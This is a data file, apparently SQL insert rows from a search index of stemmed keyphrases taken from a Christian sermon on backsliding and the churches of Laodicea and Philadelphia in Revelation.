(281734, 'a backslidden christian', 'a backslidden christian', 0, 1, 1.7667, 'A1243526235', 1, '*'),
(281735, 'a body of', 'a body of', 0, 1, 1.3, 'A131', 1, '*'),
(281736, 'a christian both', 'a christian both', 0, 1, 1.5333, 'A2623513', 1, '*'),
(281737, 'a christian must', 'a christian must', 0, 1, 1.5333, 'A2623523', 1, '*'),
(281738, 'a description', 'a description', 0, 1, 1.4333, 'A326135', 1, '*'),
(281739, 'a description of', 'a description of', 0, 1, 1.5333, 'A3261351', 1, '*'),
(281740, 'a fresh', 'a fresh', 0, 1, 1.2333, 'A162', 1, '*'),
(281741, 'a fresh walk', 'a fresh walk', 0, 1, 1.4, 'A16242', 1, '*'),
(281742, 'a great deal', 'a great deal', 0, 1, 1.4, 'A2634', 1, '*'),
(281743, 'a holy life', 'a holy life', 0, 1, 1.3667, 'A410', 1, '*'),
(281744, 'a little strength', 'a little strength', 0, 1, 1.5667, 'A434236523', 1, '*'),
(281745, 'a spiritual warrior', 'a spiritual warrior', 0, 1, 1.6333, 'A216346', 1, '*'),
(281746, 'a strong and', 'a strong and', 0, 1, 1.4, 'A2365253', 1, '*'),
(281747, 'a synagogue', 'a synagogue', 0, 1, 1.3667, 'A252', 1, '*'),
(281748, 'a synagogue of', 'a synagogue of', 0, 1, 1.4667, 'A2521', 1, '*'),
(281749, 'abandoned kingdom', 'abandon kingdom', 0, 1, 1.5667, 'A1535325235', 1, '*'),
(281750, 'abandoned kingdom service', 'abandon kingdom service', 0, 1, 1.8333, 'A15353252352612', 1, '*'),
(281751, 'able to walk', 'abl to walk', 0, 1, 1.4, 'A14342', 1, '*'),
(281752, 'about serving', 'about serving', 0, 1, 1.4333, 'A1326152', 1, '*'),
(281753, 'about serving jesus', 'about serving jesus', 0, 1, 1.6333, 'A1326152', 1, '*'),
(281754, 'achieved', 'achiev', 0, 0, 0.5333, 'A213', 1, '*'),
(281755, 'achieved a', 'achiev a', 0, 1, 1.3333, 'A213', 1, '*'),
(281756, 'achieved a great', 'achiev a great', 0, 1, 1.5333, 'A213263', 1, '*'),
(281757, 'acts 5 v.19-20', 'act 5 v.19-20', 0, 1, 1.4667, 'A2321', 1, '*'),
(281758, 'advance at', 'advanc at', 0, 1, 1.3333, 'A31523', 1, '*'),
(281759, 'advance at christ\'s', 'advanc at christ', 0, 1, 1.6333, 'A3152326232', 1, '*'),
(281760, 'also be', 'also be', 0, 1, 1.2333, 'A421', 1, '*'),
(281761, 'also be a', 'also be a', 0, 1, 1.3, 'A421', 1, '*'),
(281762, 'always an', 'alwai an', 0, 1, 1.3, 'A425', 1, '*'),
(281763, 'always an inherent', 'alwai an inherent', 0, 1, 1.6, 'A425653', 1, '*'),
(281764, 'among other', 'among other', 0, 1, 1.3667, 'A5236', 1, '*'),
(281765, 'among other behold', 'among other behold', 0, 1, 1.6, 'A5236143', 1, '*'),
(281766, 'an inherent', 'an inherent', 0, 1, 1.3667, 'A5653', 1, '*'),
(281767, 'an inherent danger', 'an inherent danger', 0, 1, 1.6, 'A5653526', 1, '*'),
(281768, 'an open', 'an open', 0, 1, 1.2333, 'A515', 1, '*'),
(281769, 'an open door', 'an open door', 0, 1, 1.4, 'A51536', 1, '*'),
(281770, 'an opening', 'an opening', 0, 1, 1.3333, 'A5152', 1, '*'),
(281771, 'an opening to', 'an opening to', 0, 1, 1.4333, 'A51523', 1, '*'),
(281772, 'and christ', 'and christ', 0, 1, 1.3333, 'A532623', 1, '*'),
(281773, 'and christ said', 'and christ said', 0, 1, 1.5, 'A53262323', 1, '*'),
(281774, 'and eve in', 'and eve in', 0, 1, 1.3333, 'A5315', 1, '*'),
(281775, 'and he has', 'and he has', 0, 1, 1.3333, 'A532', 1, '*'),
(281776, 'and his name', 'and his name', 0, 1, 1.4, 'A5325', 1, '*'),
(281777, 'and mighty', 'and mighty', 0, 1, 1.3333, 'A53523', 1, '*'),
(281778, 'and mighty pillar', 'and mighty pillar', 0, 1, 1.5667, 'A53523146', 1, '*'),
(281779, 'and open the', 'and open the', 0, 1, 1.4, 'A53153', 1, '*'),
(281780, 'and pride', 'and pride', 0, 1, 1.3, 'A53163', 1, '*'),
(281781, 'and pride of', 'and pride of', 0, 1, 1.4, 'A531631', 1, '*'),
(281782, 'and received', 'and received', 0, 1, 1.4, 'A536213', 1, '*'),
(281783, 'and received god\'s', 'and received god', 0, 1, 1.6, 'A536213232', 1, '*'),
(281784, 'and someone', 'and someone', 0, 1, 1.3667, 'A5325', 1, '*'),
(281785, 'and someone who', 'and someone who', 0, 1, 1.5, 'A5325', 1, '*'),
(281786, 'and the name', 'and the name', 0, 1, 1.4, 'A535', 1, '*'),
(281787, 'and the rapture', 'and the rapture', 0, 1, 1.5, 'A536136', 1, '*'),
(281788, 'and the word', 'and the word', 0, 1, 1.4, 'A5363', 1, '*'),
(281789, 'and there was', 'and there was', 0, 1, 1.4333, 'A5362', 1, '*'),
(281790, 'and will dine', 'and will dine', 0, 1, 1.4333, 'A53435', 1, '*'),
(281791, 'are example', 'ar example', 0, 1, 1.3667, 'A62514', 1, '*'),
(281792, 'are example true', 'ar example true', 0, 1, 1.5333, 'A6251436', 1, '*'),
(281793, 'are living our', 'ar living our', 0, 1, 1.4667, 'A641526', 1, '*'),
(281794, 'are lost', 'ar lost', 0, 1, 1.2667, 'A6423', 1, '*'),
(281795, 'are lost the', 'ar lost the', 0, 1, 1.4, 'A6423', 1, '*'),
(281796, 'are lukewarm', 'ar lukewarm', 0, 1, 1.4, 'A64265', 1, '*'),
(281797, 'are lukewarm ask', 'ar lukewarm ask', 0, 1, 1.5333, 'A642652', 1, '*'),
(281798, 'are promised', 'ar promised', 0, 1, 1.4, 'A616523', 1, '*'),
(281799, 'are promised an', 'ar promised an', 0, 1, 1.5, 'A6165235', 1, '*'),
(281800, 'are said', 'ar said', 0, 1, 1.2667, 'A623', 1, '*'),
(281801, 'are said to', 'ar said to', 0, 1, 1.3667, 'A623', 1, '*'),
(281802, 'are three major', 'ar three major', 0, 1, 1.5, 'A636526', 1, '*'),
(281803, 'are you committed', 'ar you committed', 0, 1, 1.5667, 'A6253', 1, '*'),
(281804, 'ask you what', 'ask you what', 0, 1, 1.4, 'A230', 1, '*'),
(281805, 'ask yourself these', 'ask yourself these', 0, 1, 1.6, 'A2624132', 1, '*'),
(281806, 'assignments in your', 'assign in your', 0, 1, 1.6333, 'A253256', 1, '*'),
(281807, 'assumption read', 'assumpt read', 0, 1, 1.5, 'A2513563', 1, '*'),
(281808, 'assumption read luke', 'assumpt read luke', 0, 1, 1.6667, 'A251356342', 1, '*'),
(281809, 'at christ\'s', 'at christ', 0, 1, 1.3667, 'A326232', 1, '*'),
(281810, 'at christ\'s command', 'at christ command', 0, 1, 1.6333, 'A32623253', 1, '*'),
(281811, 'at laodicea', 'at laodicea', 0, 1, 1.3667, 'A3432', 1, '*'),
(281812, 'at laodicea were', 'at laodicea were', 0, 1, 1.5333, 'A34326', 1, '*'),
(281813, 'at the door', 'at the door', 0, 1, 1.3667, 'A360', 1, '*'),
(281814, 'back from', 'back from', 0, 1, 1.3, 'B2165', 1, '*'),
(281815, 'back from fulfilling', 'back from fulfilling', 0, 1, 1.6667, 'B2165141452', 1, '*'),
(281816, 'backslidden', 'backslidden', 0, 0, 0.7333, 'B2435', 1, '*'),
(281817, 'backslidden christian', 'backslidden christian', 0, 1, 1.7, 'B243526235', 1, '*'),
(281818, 'backslidden christian rev', 'backslidden christian rev', 0, 1, 1.8333, 'B24352623561', 1, '*'),
(281819, 'backslidden christians', 'backslidden christians', 0, 1, 1.7333, 'B2435262352', 1, '*'),
(281820, 'backslidden christians those', 'backslidden christians those', 0, 1, 1.9333, 'B243526235232', 1, '*'),
(281821, 'be a synagogue', 'be a synagogue', 0, 1, 1.4667, 'B252', 1, '*'),
(281822, 'be found working', 'be found working', 0, 1, 1.5333, 'B536252', 1, '*'),
(281823, 'be remedied', 'be remedied', 0, 1, 1.3667, 'B653', 1, '*'),
(281824, 'be remedied jesus', 'be remedied jesus', 0, 1, 1.5667, 'B6532', 1, '*'),
(281825, 'because he loves', 'becaus he loves', 0, 1, 1.5333, 'B2412', 1, '*'),
(281826, 'because of deceitfulness', 'becaus of deceitfulness', 0, 1, 1.8, 'B213231452', 1, '*'),
(281827, 'become pillars', 'becom pillars', 0, 1, 1.4667, 'B251462', 1, '*'),
(281828, 'become pillars in', 'becom pillars in', 0, 1, 1.5667, 'B2514625', 1, '*'),
(281829, 'been in', 'been in', 0, 1, 1.2333, 'B500', 1, '*'),
(281830, 'been in faith', 'been in faith', 0, 1, 1.4333, 'B513', 1, '*'),
(281831, 'been small', 'been small', 0, 1, 1.3333, 'B5254', 1, '*'),
(281832, 'been small in', 'been small in', 0, 1, 1.4333, 'B52545', 1, '*'),
(281833, 'behold he', 'behold he', 0, 1, 1.3, 'B430', 1, '*'),
(281834, 'behold he stands', 'behold he stands', 0, 1, 1.5333, 'B4323532', 1, '*'),
(281835, 'being given unto', 'be given unto', 0, 1, 1.5333, 'B52153', 1, '*'),
(281836, 'believed false', 'believ false', 0, 1, 1.4667, 'B413142', 1, '*'),
(281837, 'believed false teachers', 'believ false teachers', 0, 1, 1.7667, 'B4131423262', 1, '*'),
(281838, 'believers at', 'believ at', 0, 1, 1.4, 'B41623', 1, '*'),
(281839, 'believers at laodicea', 'believ at laodicea', 0, 1, 1.7, 'B41623432', 1, '*'),
(281840, 'blind', 'blind', 0, 0, 0.3333, 'B453', 1, '*'),
(281841, 'blind isaiah', 'blind isaiah', 0, 1, 1.4, 'B4532', 1, '*'),
(281842, 'blind isaiah 43', 'blind isaiah 43', 0, 1, 1.5, 'B4532', 1, '*'),
(281843, 'blindness', 'blind', 0, 0, 0.6, 'B45352', 1, '*'),
(281844, 'blindness to', 'blind to', 0, 1, 1.4, 'B453523', 1, '*'),
(281845, 'blindness to the', 'blind to the', 0, 1, 1.5333, 'B453523', 1, '*'),
(281846, 'body of christians', 'bodi of christians', 0, 1, 1.6, 'B31262352', 1, '*'),
(281847, 'both are', 'both are', 0, 1, 1.2667, 'B360', 1, '*'),
(281848, 'both are lost', 'both are lost', 0, 1, 1.4333, 'B36423', 1, '*'),
(281849, 'but they had', 'but they had', 0, 1, 1.4, 'B300', 1, '*'),
(281850, 'call for your', 'call for your', 0, 1, 1.4333, 'C416', 1, '*'),
(281851, 'can hear', 'can hear', 0, 1, 1.2667, 'C560', 1, '*'),
(281852, 'can hear his', 'can hear his', 0, 1, 1.4, 'C562', 1, '*'),
(281853, 'challenges never', 'challeng never', 0, 1, 1.5333, 'C452516', 1, '*'),
(281854, 'challenges never give', 'challeng never give', 0, 1, 1.7, 'C45251621', 1, '*'),
(281855, 'christ said', 'christ said', 0, 1, 1.3667, 'C62323', 1, '*'),
(281856, 'christ said their', 'christ said their', 0, 1, 1.5667, 'C623236', 1, '*'),
(281857, 'christ\'s command', 'christ command', 0, 1, 1.5333, 'C623253', 1, '*'),
(281858, 'christ\'s command you', 'christ command you', 0, 1, 1.6667, 'C623253', 1, '*'),
(281859, 'christian both', 'christian both', 0, 1, 1.4667, 'C623513', 1, '*'),
(281860, 'christian both are', 'christian both are', 0, 1, 1.6, 'C6235136', 1, '*'),
(281861, 'christian journey', 'christian journey', 0, 1, 1.5667, 'C6235265', 1, '*'),
(281862, 'christian journey the', 'christian journey the', 0, 1, 1.7, 'C62352653', 1, '*'),
(281863, 'christian must take', 'christian must take', 0, 1, 1.6333, 'C6235232', 1, '*'),
(281864, 'christian rev', 'christian rev', 0, 1, 1.4333, 'C623561', 1, '*'),
(281865, 'christian rev 3', 'christian rev 3', 0, 1, 1.5, 'C623561', 1, '*'),
(281866, 'christians have abandoned', 'christian have abandoned', 0, 1, 1.8333, 'C6235215353', 1, '*'),
(281867, 'christians have not', 'christian have not', 0, 1, 1.6333, 'C62352153', 1, '*'),
(281868, 'christians in philadelphia', 'christian in philadelphia', 0, 1, 1.8667, 'C62352514341', 1, '*'),
(281869, 'christians meeting', 'christian meeting', 0, 1, 1.6, 'C623525352', 1, '*'),
(281870, 'christians meeting could', 'christian meeting could', 0, 1, 1.8, 'C62352535243', 1, '*'),
(281871, 'christians rev', 'christian rev', 0, 1, 1.4667, 'C6235261', 1, '*'),
(281872, 'christians rev 3', 'christian rev 3', 0, 1, 1.5333, 'C6235261', 1, '*'),
(281873, 'christians those', 'christian those', 0, 1, 1.5333, 'C6235232', 1, '*'),
(281874, 'christians those that', 'christian those that', 0, 1, 1.7, 'C62352323', 1, '*'),
(281875, 'christians who stand', 'christian who stand', 0, 1, 1.6667, 'C62352353', 1, '*'),
(281876, 'christians\'', 'christian', 0, 0, 0.7333, 'C62352', 1, '*'),
(281877, 'christians\' lives', 'christian lives', 0, 1, 1.5667, 'C62352412', 1, '*'),
(281878, 'christians\' lives today', 'christian lives today', 0, 1, 1.7667, 'C623524123', 1, '*'),
(281879, 'church in', 'church in', 0, 1, 1.3, 'C625', 1, '*'),
(281880, 'church in laodicea', 'church in laodicea', 0, 1, 1.6, 'C625432', 1, '*'),
(281881, 'church may', 'church may', 0, 1, 1.3333, 'C625', 1, '*'),
(281882, 'church may have', 'church may have', 0, 1, 1.5, 'C6251', 1, '*'),
(281883, 'church rev', 'church rev', 0, 1, 1.3333, 'C6261', 1, '*'),
(281884, 'church rev 4', 'church rev 4', 0, 1, 1.4, 'C6261', 1, '*'),
(281885, 'church services', 'church services', 0, 1, 1.5, 'C62612', 1, '*'),
(281886, 'church services are', 'church services are', 0, 1, 1.6333, 'C626126', 1, '*'),
(281887, 'church to get', 'church to get', 0, 1, 1.4333, 'C62323', 1, '*'),
(281888, 'churches to', 'church to', 0, 1, 1.3667, 'C623', 1, '*'),
(281889, 'churches to synagogue', 'church to synagogue', 0, 1, 1.7, 'C623252', 1, '*'),
(281890, 'come in to', 'come in to', 0, 1, 1.3333, 'C530', 1, '*'),
(281891, 'coming when', 'come when', 0, 1, 1.3667, 'C525', 1, '*'),
(281892, 'coming when no', 'come when no', 0, 1, 1.4667, 'C525', 1, '*'),
(281893, 'command you', 'command you', 0, 1, 1.3667, 'C530', 1, '*'),
(281894, 'command you may', 'command you may', 0, 1, 1.5, 'C535', 1, '*'),
(281895, 'committed to evangelism', 'commit to evangelism', 0, 1, 1.7667, 'C53152425', 1, '*'),
(281896, 'committed to living', 'commit to living', 0, 1, 1.6333, 'C534152', 1, '*'),
(281897, 'committed to spending', 'commit to spending', 0, 1, 1.7, 'C53215352', 1, '*'),
(281898, 'committed to your', 'commit to your', 0, 1, 1.5667, 'C536', 1, '*'),
(281899, 'condition must', 'condit must', 0, 1, 1.4667, 'C53523', 1, '*'),
(281900, 'condition must be', 'condit must be', 0, 1, 1.5667, 'C535231', 1, '*'),
(281901, 'condition of a', 'condit of a', 0, 1, 1.4667, 'C5351', 1, '*'),
(281902, 'continue like', 'continu like', 0, 1, 1.4333, 'C53542', 1, '*'),
(281903, 'continue like this', 'continu like this', 0, 1, 1.6, 'C5354232', 1, '*'),
(281904, 'could also', 'could also', 0, 1, 1.3333, 'C4342', 1, '*'),
(281905, 'could also be', 'could also be', 0, 1, 1.4333, 'C43421', 1, '*'),
(281906, 'could not cover', 'could not cover', 0, 1, 1.5, 'C4353216', 1, '*'),
(281907, 'could take the', 'could take the', 0, 1, 1.4667, 'C4323', 1, '*'),
(281908, 'cover their', 'cover their', 0, 1, 1.3667, 'C1636', 1, '*'),
(281909, 'cover their nakedness', 'cover their nakedness', 0, 1, 1.7, 'C163652352', 1, '*'),
(281910, 'covered adam', 'cover adam', 0, 1, 1.4, 'C1635', 1, '*'),
(281911, 'covered adam and', 'cover adam and', 0, 1, 1.5333, 'C16353', 1, '*'),
(281912, 'danger of failing', 'danger of failing', 0, 1, 1.5667, 'D5261452', 1, '*'),
(281913, 'days they', 'dai they', 0, 1, 1.3, 'D230', 1, '*'),
(281914, 'days they are', 'dai they are', 0, 1, 1.4333, 'D236', 1, '*'),
(281915, 'deal they', 'deal they', 0, 1, 1.3, 'D430', 1, '*'),
(281916, 'deal they have', 'deal they have', 0, 1, 1.4667, 'D431', 1, '*'),
(281917, 'denied', 'deni', 0, 0, 0.4, 'D530', 1, '*'),
(281918, 'denied him', 'deni him', 0, 1, 1.3333, 'D535', 1, '*'),
(281919, 'denied him they', 'deni him they', 0, 1, 1.5, 'D5353', 1, '*'),
(281920, 'described in', 'describ in', 0, 1, 1.4, 'D26135', 1, '*'),
(281921, 'described in mat', 'describ in mat', 0, 1, 1.5333, 'D261353', 1, '*'),
(281922, 'description', 'descript', 0, 0, 0.7333, 'D26135', 1, '*'),
(281923, 'description of', 'descript of', 0, 1, 1.4667, 'D261351', 1, '*'),
(281924, 'description of backslidden', 'descript of backslidden', 0, 1, 1.8667, 'D2613512435', 1, '*'),
(281925, 'description of such', 'descript of such', 0, 1, 1.6333, 'D2613512', 1, '*'),
(281926, 'devil has stolen', 'devil has stolen', 0, 1, 1.5333, 'D142345', 1, '*'),
(281927, 'difference really', 'differ really', 0, 1, 1.5667, 'D165264', 1, '*'),
(281928, 'difference really in', 'differ really in', 0, 1, 1.6667, 'D1652645', 1, '*'),
(281929, 'dine', 'dine', 0, 0, 0.2667, 'D500', 1, '*'),
(281930, 'dine with', 'dine with', 0, 1, 1.3, 'D530', 1, '*'),
(281931, 'dine with you', 'dine with you', 0, 1, 1.4333, 'D530', 1, '*'),
(281932, 'divine instructions the', 'divin instructions the', 0, 1, 1.7667, 'D1523623523', 1, '*'),
(281933, 'do not know', 'do not know', 0, 1, 1.3667, 'D5325', 1, '*'),
(281934, 'do you take', 'do you take', 0, 1, 1.3667, 'D200', 1, '*'),
(281935, 'door', 'door', 0, 0, 0.2667, 'D600', 1, '*'),
(281936, 'door he', 'door he', 0, 1, 1.2333, 'D600', 1, '*'),
(281937, 'door he opens', 'door he opens', 0, 1, 1.4333, 'D6152', 1, '*'),
(281938, 'door in', 'door in', 0, 1, 1.2333, 'D650', 1, '*'),
(281939, 'door in scripture', 'door in scripture', 0, 1, 1.5667, 'D6526136', 1, '*'),
(281940, 'door knocking', 'door knocking', 0, 1, 1.4333, 'D625252', 1, '*'),
(281941, 'door knocking if', 'door knocking if', 0, 1, 1.5333, 'D6252521', 1, '*'),
(281942, 'door of', 'door of', 0, 1, 1.2333, 'D610', 1, '*'),
(281943, 'door of your', 'door of your', 0, 1, 1.4, 'D616', 1, '*'),
(281944, 'door refers', 'door refers', 0, 1, 1.3667, 'D6162', 1, '*'),
(281945, 'door refers to', 'door refers to', 0, 1, 1.4667, 'D61623', 1, '*'),
(281946, 'doors', 'door', 0, 0, 0.3333, 'D620', 2, '*'),
(281947, 'doors of', 'door of', 0, 1, 1.2667, 'D621', 1, '*'),
(281948, 'doors of opportunity', 'door of opportunity', 0, 1, 1.6667, 'D6216353', 1, '*'),
(281949, 'earthly shows', 'earthli shows', 0, 1, 1.4333, 'E6342', 1, '*'),
(281950, 'earthly shows 2', 'earthli shows 2', 0, 1, 1.5, 'E6342', 1, '*'),
(281951, 'end times', 'end times', 0, 1, 1.3, 'E5352', 1, '*'),
(281952, 'end times god', 'end times god', 0, 1, 1.4333, 'E53523', 1, '*'),
(281953, 'evangelism are', 'evangel are', 0, 1, 1.4667, 'E1524256', 1, '*'),
(281954, 'evangelism are you', 'evangel are you', 0, 1, 1.6, 'E1524256', 1, '*'),
(281955, 'eve in', 'ev in', 0, 1, 1.2, 'E150', 1, '*'),
(281956, 'eve in the', 'ev in the', 0, 1, 1.3333, 'E153', 1, '*'),
(281957, 'every door', 'everi door', 0, 1, 1.3333, 'E1636', 1, '*'),
(281958, 'every door he', 'everi door he', 0, 1, 1.4333, 'E1636', 1, '*'),
(281959, 'example true', 'exampl true', 0, 1, 1.4, 'E251436', 1, '*'),
(281960, 'example true christians', 'exampl true christians', 0, 1, 1.7667, 'E251436262352', 1, '*'),
(281961, 'excited', 'excit', 0, 0, 0.4667, 'E230', 1, '*'),
(281962, 'excited about', 'excit about', 0, 1, 1.4333, 'E2313', 1, '*'),
(281963, 'excited about serving', 'excit about serving', 0, 1, 1.7, 'E231326152', 1, '*'),
(281964, 'failing', 'fail', 0, 0, 0.4667, 'F452', 1, '*'),
(281965, 'failing to', 'fail to', 0, 1, 1.3333, 'F4523', 1, '*'),
(281966, 'failing to advance', 'fail to advance', 0, 1, 1.6, 'F4523152', 1, '*'),
(281967, 'faith but because', 'faith but because', 0, 1, 1.5667, 'F31312', 1, '*'),
(281968, 'false teachers', 'fals teachers', 0, 1, 1.4667, 'F423262', 1, '*'),
(281969, 'false teachers they', 'fals teachers they', 0, 1, 1.6333, 'F4232623', 1, '*'),
(281970, 'fear finances', 'fear finances', 0, 1, 1.4333, 'F6152', 1, '*'),
(281971, 'fear finances your', 'fear finances your', 0, 1, 1.6, 'F61526', 1, '*'),
(281972, 'feel you', 'feel you', 0, 1, 1.2667, 'F400', 1, '*'),
(281973, 'feel you have', 'feel you have', 0, 1, 1.4333, 'F410', 1, '*'),
(281974, 'fig leaves', 'fig leaves', 0, 1, 1.3333, 'F2412', 1, '*'),
(281975, 'fig leaves which', 'fig leaves which', 0, 1, 1.5333, 'F2412', 1, '*'),
(281976, 'finances your', 'financ your', 0, 1, 1.4333, 'F526', 1, '*'),
(281977, 'finances your health', 'financ your health', 0, 1, 1.6667, 'F52643', 1, '*'),
(281978, 'follows satan', 'follow satan', 0, 1, 1.4333, 'F4235', 1, '*'),
(281979, 'follows satan and', 'follow satan and', 0, 1, 1.5667, 'F42353', 1, '*'),
(281980, 'for god\'s word', 'for god word', 0, 1, 1.4667, 'F623263', 1, '*'),
(281981, 'for the earthly', 'for the earthly', 0, 1, 1.5, 'F63634', 1, '*'),
(281982, 'for the night', 'for the night', 0, 1, 1.4333, 'F63523', 1, '*'),
(281983, 'found working', 'found working', 0, 1, 1.4333, 'F536252', 1, '*'),
(281984, 'found working work', 'found working work', 0, 1, 1.6, 'F53625262', 1, '*'),
(281985, 'fresh', 'fresh', 0, 0, 0.3333, 'F620', 1, '*'),
(281986, 'fresh walk', 'fresh walk', 0, 1, 1.3333, 'F6242', 1, '*'),
(281987, 'fresh walk with', 'fresh walk with', 0, 1, 1.5, 'F62423', 1, '*'),
(281988, 'from christians\'', 'from christians', 0, 1, 1.5333, 'F65262352', 1, '*'),
(281989, 'from christians\' lives', 'from christians lives', 0, 1, 1.7333, 'F65262352412', 1, '*'),
(281990, 'from fulfilling', 'from fulfilling', 0, 1, 1.5, 'F65141452', 1, '*'),
(281991, 'from fulfilling god\'s', 'from fulfilling god', 0, 1, 1.7, 'F6514145232', 1, '*'),
(281992, 'from their mouth', 'from their mouth', 0, 1, 1.5333, 'F653653', 1, '*'),
(281993, 'fulfilling god\'s', 'fulfil god', 0, 1, 1.5333, 'F4145232', 1, '*'),
(281994, 'fulfilling god\'s call', 'fulfil god call', 0, 1, 1.7, 'F41452324', 1, '*'),
(281995, 'garden but', 'garden but', 0, 1, 1.3333, 'G63513', 1, '*'),
(281996, 'garden but when', 'garden but when', 0, 1, 1.5, 'G635135', 1, '*'),
(281997, 'gen 2 16-17', 'gen 2 16-17', 0, 1, 1.3667, 'G500', 1, '*'),
(281998, 'get excited', 'get excited', 0, 1, 1.3667, 'G323', 1, '*'),
(281999, 'get excited about', 'get excited about', 0, 1, 1.5667, 'G32313', 1, '*'),
(282000, 'give up in', 'give up in', 0, 1, 1.3333, 'G150', 1, '*'),
(282001, 'given unto', 'given unto', 0, 1, 1.3333, 'G153', 1, '*'),
(282002, 'given unto the', 'given unto the', 0, 1, 1.4667, 'G153', 1, '*'),
(282003, 'god 3 naked', 'god 3 naked', 0, 1, 1.3667, 'G3523', 1, '*'),
(282004, 'god and it', 'god and it', 0, 1, 1.3333, 'G353', 1, '*'),
(282005, 'god and there', 'god and there', 0, 1, 1.4333, 'G3536', 1, '*'),
(282006, 'god are you', 'god are you', 0, 1, 1.3667, 'G360', 1, '*'),
(282007, 'god can make', 'god can make', 0, 1, 1.4, 'G3252', 2, '*'),
(282008, 'god has left', 'god has left', 0, 1, 1.4, 'G32413', 1, '*'),
(282009, 'god is opening', 'god is opening', 0, 1, 1.4667, 'G32152', 1, '*'),
(282010, 'god the laodicea', 'god the laodicea', 0, 1, 1.5333, 'G3432', 1, '*'),
(282011, 'god their', 'god their', 0, 1, 1.3, 'G360', 1, '*'),
(282012, 'god their problem', 'god their problem', 0, 1, 1.5667, 'G3616145', 1, '*'),
(282013, 'god therefore promised', 'god therefore promised', 0, 1, 1.7333, 'G361616523', 1, '*'),
(282014, 'god was going', 'god was going', 0, 1, 1.4333, 'G3252', 1, '*'),
(282015, 'god\'s judgment', 'god judgment', 0, 1, 1.4667, 'G323253', 1, '*'),
(282016, 'god\'s judgment to', 'god judgment to', 0, 1, 1.5667, 'G323253', 1, '*'),
(282017, 'god\'s strength', 'god strength', 0, 1, 1.4667, 'G3236523', 1, '*'),
(282018, 'god\'s strength the', 'god strength the', 0, 1, 1.6, 'G3236523', 1, '*'),
(282019, 'going to make', 'go to make', 0, 1, 1.4333, 'G52352', 1, '*'),
(282020, 'gospel acts', 'gospel acts', 0, 1, 1.3667, 'G14232', 1, '*'),
(282021, 'gospel acts 5', 'gospel acts 5', 0, 1, 1.4333, 'G14232', 1, '*'),
(282022, 'great deal', 'great deal', 0, 1, 1.3333, 'G634', 1, '*'),
(282023, 'great deal they', 'great deal they', 0, 1, 1.5, 'G6343', 1, '*'),
(282024, 'great tribulation', 'great tribulation', 0, 1, 1.5667, 'G6361435', 1, '*'),
(282025, 'great tribulation described', 'great tribulation described', 0, 1, 1.9, 'G636143532613', 1, '*'),
(282026, 'had achieved', 'had achieved', 0, 1, 1.4, 'H3213', 1, '*'),
(282027, 'had achieved a', 'had achieved a', 0, 1, 1.4667, 'H3213', 1, '*'),
(282028, 'had persecution', 'had persecution', 0, 1, 1.5, 'H316235', 1, '*'),
(282029, 'had persecution yet', 'had persecution yet', 0, 1, 1.6333, 'H3162353', 1, '*'),
(282030, 'hand among', 'hand among', 0, 1, 1.3333, 'H5352', 1, '*'),
(282031, 'hand among other', 'hand among other', 0, 1, 1.5333, 'H535236', 1, '*'),
(282032, 'happens to', 'happen to', 0, 1, 1.3333, 'H1523', 1, '*'),
(282033, 'happens to a', 'happen to a', 0, 1, 1.4, 'H1523', 1, '*'),
(282034, 'has left', 'ha left', 0, 1, 1.2667, 'H2413', 1, '*'),
(282035, 'has left them', 'ha left them', 0, 1, 1.4333, 'H24135', 1, '*'),
(282036, 'has stolen', 'ha stolen', 0, 1, 1.3333, 'H2345', 1, '*'),
(282037, 'has stolen from', 'ha stolen from', 0, 1, 1.5, 'H2345165', 1, '*'),
(282038, 'has turned', 'ha turned', 0, 1, 1.3333, 'H23653', 1, '*'),
(282039, 'has turned several', 'ha turned several', 0, 1, 1.6, 'H236532164', 1, '*'),
(282040, 'have abandoned', 'have abandoned', 0, 1, 1.4667, 'H15353', 1, '*'),
(282041, 'have abandoned kingdom', 'have abandoned kingdom', 0, 1, 1.7333, 'H1535325235', 1, '*'),
(282042, 'have been small', 'have been small', 0, 1, 1.5, 'H15254', 1, '*'),
(282043, 'have had persecution', 'have had persecution', 0, 1, 1.6667, 'H1316235', 1, '*'),
(282044, 'have little', 'have little', 0, 1, 1.3667, 'H1434', 1, '*'),
(282045, 'have little strength', 'have little strength', 0, 1, 1.6667, 'H1434236523', 1, '*'),
(282046, 'have not believed', 'have not believed', 0, 1, 1.5667, 'H1531413', 1, '*'),
(282047, 'have not denied', 'have not denied', 0, 1, 1.5, 'H15353', 1, '*'),
(282048, 'have not said', 'have not said', 0, 1, 1.4333, 'H15323', 1, '*'),
(282049, 'have once', 'have once', 0, 1, 1.3, 'H152', 1, '*'),
(282050, 'have once been', 'have once been', 0, 1, 1.4667, 'H15215', 1, '*'),
(282051, 'have only', 'have only', 0, 1, 1.3, 'H154', 1, '*'),
(282052, 'have only a', 'have only a', 0, 1, 1.3667, 'H154', 1, '*'),
(282053, 'have really', 'have really', 0, 1, 1.3667, 'H164', 1, '*'),
(282054, 'have really repented', 'have really repented', 0, 1, 1.6667, 'H1646153', 1, '*'),
(282055, 'have strength', 'have strength', 0, 1, 1.4333, 'H1236523', 1, '*'),
(282056, 'have strength they', 'have strength they', 0, 1, 1.6, 'H1236523', 1, '*'),
(282057, 'he has turned', 'he has turned', 0, 1, 1.4333, 'H23653', 1, '*'),
(282058, 'he loves', 'he loves', 0, 1, 1.2667, 'H412', 1, '*'),
(282059, 'he loves you', 'he loves you', 0, 1, 1.4, 'H412', 1, '*'),
(282060, 'he opens', 'he opens', 0, 1, 1.2667, 'H152', 1, '*'),
(282061, 'he opens let', 'he opens let', 0, 1, 1.4, 'H15243', 1, '*'),
(282062, 'he stands', 'he stands', 0, 1, 1.3, 'H23532', 1, '*'),
(282063, 'he stands at', 'he stands at', 0, 1, 1.4, 'H235323', 1, '*'),
(282064, 'health or', 'health or', 0, 1, 1.3, 'H436', 1, '*'),
(282065, 'health or challenges', 'health or challenges', 0, 1, 1.6667, 'H4362452', 1, '*'),
(282066, 'hear his', 'hear his', 0, 1, 1.2667, 'H620', 1, '*'),
(282067, 'hear his voice', 'hear his voice', 0, 1, 1.4667, 'H6212', 1, '*'),
(282068, 'heart set', 'heart set', 0, 1, 1.3, 'H6323', 1, '*'),
(282069, 'heart set on', 'heart set on', 0, 1, 1.4, 'H63235', 1, '*'),
(282070, 'heaven how', 'heaven how', 0, 1, 1.3333, 'H150', 1, '*'),
(282071, 'heaven how much', 'heaven how much', 0, 1, 1.5, 'H152', 1, '*'),
(282072, 'him they', 'him they', 0, 1, 1.2667, 'H530', 1, '*'),
(282073, 'him they have', 'him they have', 0, 1, 1.4333, 'H531', 1, '*'),
